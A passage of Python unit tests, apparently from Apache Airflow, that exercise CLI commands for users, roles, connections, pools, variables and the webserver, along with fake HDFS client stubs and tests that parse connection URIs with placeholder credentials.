with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.users_list(self.parser.parse_args(['users', 'list']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id') # this key not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', 'import', f.name
])
cli.users_import(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', 'export', f.name
])
cli.users_export(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', 'add_role', '--username', 'test4', '--role', 'Op'
])
cli.users_manage_role(args, remove=False)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', 'remove_role', '--username', 'test4', '--role', 'Viewer'
])
cli.users_manage_role(args, remove=True)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.roles_list(self.parser.parse_args(['roles', 'list']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['tasks', 'list', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'tasks', 'list', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
def test_cli_list_jobs(self):
args = self.parser.parse_args(['dags', 'list_jobs'])
cli.list_jobs(args)
def test_cli_list_jobs_with_args(self):
args = self.parser.parse_args(['dags', 'list_jobs', '--dag_id',
'example_bash_operator',
'--state', 'success',
'--limit', '100'])
cli.list_jobs(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['db', 'init']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['db', 'reset', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_list(self.parser.parse_args(['connections', 'list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', 'list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new2',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_uri
with self.assertRaises(SystemExit) as exc:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new']))
self.assertEqual(
exc.exception.code,
"The following args are required to add a connection: ['conn_uri or conn_type']"
)
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new1']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new2']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new3']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new4']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new5']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'tasks', 'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'tasks', 'state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dags', 'state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'dags', 'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'dags', 'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'example_subdag_operator',
'--yes']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'subdag', '-dx', '--yes']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'foobar', '-dx', '--yes']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'dags', 'delete',
'does_not_exist_dag',
'--yes'])
)
def test_delete_dag_existing_file(self):
# Test to check that the DAG should be deleted even if
# the file containing it is not deleted
DM = DagModel
key = "my_dag_id"
session = settings.Session()
with tempfile.NamedTemporaryFile() as f:
session.add(DM(dag_id=key, fileloc=f.name))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
def test_pool_create(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
try:
cli.pool_get(self.parser.parse_args(['pools', 'get', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
cli.pool_delete(self.parser.parse_args(['pools', 'delete', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool_import(self.parser.parse_args(['pools', 'import', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool import pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool_export(self.parser.parse_args(['pools', 'export', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool export pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"bar"}']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'foo']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'baz', '-d', 'bar']))
cli.variables_list(self.parser.parse_args([
'variables', 'list']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'bar']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', DEV_NULL]))
cli.variables_export(self.parser.parse_args([
'variables', 'export', DEV_NULL]))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'original']))
# First export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'updated']))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"oops"}']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'foo']))
# First import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'list', '["oops"]']))
# Set str
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'str', 'hello string']))
# Set int
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'int', '42']))
# Set float
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'float', '42.0']))
# Set true
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'true', 'true']))
# Set false
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'false', 'false']))
# Set none
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'null', 'null']))
# Export and then import
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables3.json']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class FakeWebHDFSHook:
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient:
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook:
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class TestWebHDFSHook(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
